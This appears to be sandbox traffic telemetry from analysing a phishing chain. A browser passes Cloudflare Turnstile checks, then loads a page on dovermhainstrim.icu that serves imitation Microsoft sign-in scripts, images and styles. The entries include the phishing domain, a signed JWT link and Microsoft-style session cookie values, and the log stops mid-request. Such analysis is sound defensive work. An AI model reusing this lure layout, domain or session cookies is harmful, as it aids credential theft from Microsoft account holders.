  GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/ HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: iframe
  Sec-Fetch-Storage-Access: active
  Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690c198d8043fb&lang=auto HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8 HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLp HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Sec-Fetch-Storage-Access: active
  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLp HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/pat/92690c198d8043fb/1743017267269/20ef7ed6af7716c2d33dbf968f23fffc06de1674adc4fea29426c51f8039b9b8/-1Wpqa_tefiexnv HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  Cache-Control: max-age=0
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8 HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8 HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvdmVybWhhaW5zdHJpbS5pY3UvIiwiZG9tYWluIjoiZG92ZXJtaGFpbnN0cmltLmljdSIsImtleSI6IlhNRTVmSGFWVElVRiIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDE3Mjc2LCJleHAiOjE3NDMwMTczOTZ9.A7dhC-EcPIGb2ArdizRnXGDDwF2DwmwJ_bm9_3_Qmgo HTTP/1.1
  Host: dovermhainstrim.icu
  Connection: keep-alive
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: iframe
  Sec-Fetch-Storage-Access: active
  Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /index.html//?uuq_tgnqcf=vtwg HTTP/1.1
  Host: dovermhainstrim.icu
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: iframe
  Sec-Fetch-Storage-Access: active
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
  Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE

Source: global traffic | HTTP traffic detected:
  GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1
  Host: dovermhainstrim.icu
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: text/css,*/*;q=0.1
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: style
  Sec-Fetch-Storage-Access: active
  Referer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwg
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
  Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.js HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_r1sg5sxlkljjoa22hvk04g2.js HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /Prefetch/Prefetch.aspx HTTP/1.1Host: portal.microsoftonline.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; 